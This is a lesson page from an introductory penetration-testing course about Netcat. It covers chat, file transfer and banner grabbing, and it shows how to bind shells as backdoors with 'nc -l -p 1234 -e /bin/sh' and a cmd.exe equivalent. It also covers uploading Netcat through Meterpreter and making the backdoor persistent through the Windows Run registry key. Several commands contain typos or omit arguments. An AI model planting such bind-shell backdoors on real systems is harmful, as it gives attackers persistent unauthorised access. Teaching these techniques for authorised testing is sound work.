---
title: Netcat
course: intro_pentest
section: "Maintaining Access with Backdoors and Rootkits"
layout: lesson
---

Netcat is an incredibly and unbelievably flexible tool that allows communication
and network traffic to flow from one machine to another. Although Netcat’s
flexibility makes it an excellent choice for a backdoor, there are dozens of
other uses for this tool. Netcat can be used to transfer files between machines,
conduct port scans, serve as a simple instant messenger/chat and even function
as a simple web server!. We’ll cover the basics here, but you should spend time
practising and playing with Netcat. You’ll be amazed at what this tool is
capable of. It is nicknamed the “swiss army knife” for a reson.

Netcat was originally written and released by Hobbit in 1996 and supports
sending and receiving both TCP and UDP traffic. Netcan can function in either a
client or server mode. When it is in client mode, the tool can be used to make a
network connection to another service (including another instance of Netcat). It
is important to remember that Netcan can connect from any port on your local
machine to any port on the target machine. While Netcat is running in server
mode, it acts as a listener where it waits to accept an incoming connection.

Let’s start with a very basic example of how we can use Netcat. In this example,
we’ll set up Netcat to serve as a communication channel between two machines. To
set this up on the first machine, we simply need to choose a port and instruct
Netcat to run in listener mode. Issuing the following command in a terminal will
accomplish this task:

```
nc -l -p 2323
```

In the command above, “nc” is used to invoke the Netcat program, whereas the
“-l” is used to put Netcat into a listener mode. The “-p” is used to specify the
port number we want Netcat to listen on. At this point, Netcat is runnign and
waiting to accept an incoming connection on port 2323.

Now that we have Netcat listening on the first machine, we can move to the
second machine. To make a connection to the listening machine, we issue the
following command:

```
nc 192.168.1.7 2323
```

Running this command from the second PC will force Netcat to attempt a
connection to port 2323 on the machine with an IP address of “192.168.1.7”.
Because we have set up the first PC to act as a listener on that port, the two
PCs should now be able to communicate. We can test this by typing text into
either terminal window. Anything that we type into the terminal from either
machine, will be displayed in the terminal window of both machines. This is
because the keyboard is acting as the standard input and Netcat is simply
transporting the data entered (keystrokes) over the connection.

To end the “chat” and close the session, we can issue the CTRL+C key comination;
this will terminate the Netcat connection.

It is important to understand that once you kill or close the Netcat connection,
you’ll need to restart the program on the target machine before making another
connection. Constantly needing to connect to the target machine to restart
Netcat is not very efficient. Fortunately, if you are using the Windows version
of the program, Netcat provides a way to avoid this issue. In the Windows
version of Netcat, if we start Netcat in listener mode using a “-L” rather than
a “-l” the target will keep the connection open on the specified port even after
the client disconnects. In many ways, this makes the program persistent. Of
course, to make it truly persistent, you’d need to add the command to run every
time the machine starts. On a windows machine, this could be accomplished by
adding the Netcat program to the
"`HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run`" registry hive.

Unfortunately, in terms of making a persistent network connection, the Linux
version of Netcat is not quite straightforward. To make the Netcat connection
persistent on a Linux machine, you’d have to write a simple bash script that
forces Netcat to restart when the original connection is closed. If you are
interested in creating a persistent connection, there are many examples to be
found on the Internet.

Although the example above is an interesting use of Netcat and great for
demonstrating the flexibility and power of the tool, actually you’ll probably
never use the “chat” feature during a penetration test. On the other hand, once
you have got Netcat uploaded to your target system, there are many practical
uses for the tool. Let’s take a look at something a bit more advanageous, like
transferring files.

Moving files between computers is easy when we have got the Meterpreter shell
running, but remember, we don’t want to exploit the target every time. Rather,
the goal is to exploit once and then leave a backdoor so we can return at a
later date. If we upload Netcat to the target, we can use the program to
transfer files to and from our target across a network.

For this example, assume you want to upload a new file from your local machine
to the target machine. With Netcat running on the target machine, we issue the
following command:

```
nc -l -p 7777 > calc.exe
```

This command will force the target to listen for an incoming connection on port
7777. Any input that is received will be stored into a file called “calc.exe”.

From our local machine, we need to use Netcat to make a connection to the target
and specify the file we want to send to the target. We accomplish this by
issuing the following command:

```
nc 192.168.1.10 < calc.exe
```

Unfortunately, Netcat doesn’t provide you any type of feedback letting you know
when the transfer has been completed. Because you’ll receive no indication when
the upload is done, it’s best to just wait for a few seconds and then issue a
CTRL+C to kill the connection. At this point, you should be able to run the “ls”
command on your target machine and see the newly created file.

Naturally, you could set up a Netcat connection to pull files from the target
machine by reversing the commands above.

Ofentimes, during a penetration tets, you’ll discover open ports that provide
little or no additional information. You may run across situations where both
Nmap and Nessus are unable to discover the service behind the port. In these
cases, it’s often very beneficial to use Netcat to make blind connection to the
port. Once you have made the connection, you can begin sending information to
the port by typing on the keyboard. In some instances, the keyboard input will
elicit a response from the service. This response may be helpful in allowing you
to identify the service. Consider the following example:

Assume you are conducting a penetration test on a target server. During the
scanning process you discover that port 50001 is open. Unfortunately, neither
your port scanner nor your vulnerability scanners were able to determine what
service was running behind the port. In this case, it can be handy to use Netcat
to interact with the unknown service. To force Netcat to attempt a connection to
the service, we simply enter the following command:

```
nc 192.168.1.10 50001
```

This command will attempt to create a TCP connection to the port and service. It
is important to note that you can force Netcat to send UDP packets by issuing
the “-u” switch. Once the connection is made, in most cases it’s easiest to
simply enter some etxt and hit return key to the service. If the service
responds to the unexpected request, you may be able to derive its function.

As you can see, we used Netcat to create a connection to port “50001”. Once
connected, the text “test” was sent through the connection. The service returned
with a response that clearly indicates that the mysterious services is a web
server. And even more important, the server was fully identified itself as an
Apache server running version 2.2.9 on a Linux Ubuntu machine!.

Finally, we can use Netcat to bind itself a process and make that process
available over a remote connection. This allows us to execute and interact with
the bound program as if we were sitting at the target machine itself. If we
start Netcat using the “-e” switch, it’ll execute whatever program we specify
directly after the “-e”. The program will execute on the target machine and will
run once a connection has been stablished. The “-e” parameter is incredibly
powerful and very useful for setting up a backdoor shell on a target.

To set up a backdoor, we’ll utilize the “-e” switch to bind a command shell from
the target machine to a port number. By setting up Netcat in this manner, laer
when we initialize a connection to the specified port, the program listed after
the “-e” switch will run. If we are using a Linux machine, we can accomplish
this by typing the following into a terminal window:

```
nc -l -p 1234 -e /bin/sh
```

This will cause the target to serve up a shell to whoever connects to port 1234.
Again, any commands sent from the Netcat client to the target machine will be
executed locally, as if the attacker were sitting at the target.

This technique can also be used on a Windows machine. To provide command line
backdoor access into a Windows machine, we’d run the following on the target (in
a terminal window):

```
nc.exe -L -p 1234 C:\Windows\System32\cmd.exe
```

To put the preceding example into context and hopefully make it more concrete
for you, let’s examine the following scenario to show how we could implement
  Netcat as a backdoor. Consider the following example: assume that we have
  successfully exploited a Windows target. Being forward-thinking penetration
  testers, we decide to create a more stable backdoor to this system so that we
  can return later. In this case, we have decided to use Netcat as our backdoor
  software.

The first order of bussiness would be to upload Netcat to the target machine; in
this example, the Netcat executable has been uploaded to the target’s System32
directory. Let’s assume that we utilized the knowledge gained from Chapter 4 and
we are currently using the Meterpreter shell to interact with our target. Once
we have a Meterpreter shell on our target, we can upload the Netcat file to the
victim by issuing the following command:

```
meterpreter> upload nc.exec C:\\Windows\\System32
```

Note: You’ll need to upload the Windows (.exe) version of Netcat because the
target is running Windows.

In this case, we have uploaded the nc.exe program to the Windows\System32
directory. This will allow us to access the cmd.exe program directly. Once
Netcat has been transferred to the target machine, we need to choose a port
number, bind the cmd.exe program and start Netcat in server mode. This will
force Necat to wait for an incoming connection on the specified port. To perform
these tasks, we need to issue the following command in a terminal (again,
assuming you are already in the same directory as Netcat).

```
meterpreter> nc -L -p 5777 -e cmd.exe
```

At this point, Netcat should be running on our target machine. Remember, if you
were interested in making this backdoor truly persistent, with the ability to
survive a reboot, you’d need to set the Netcat command to automatically start in
the Window registry.

Now that Netcat is set up, we can close our Meterpreter shell and make a
connection to the target using Netcat.

There should be a little doubt in your mind that Netcat is a truly powerful and
flexible tool. In this section, we have barely scratched the surface. If you
take some time to dig deeper into the program, you’ll find that people have been
able to perform some rather amazing things using Netcat. You are encouraged to
look into some of these clever implementations by searching the web, the results
will amaze you.
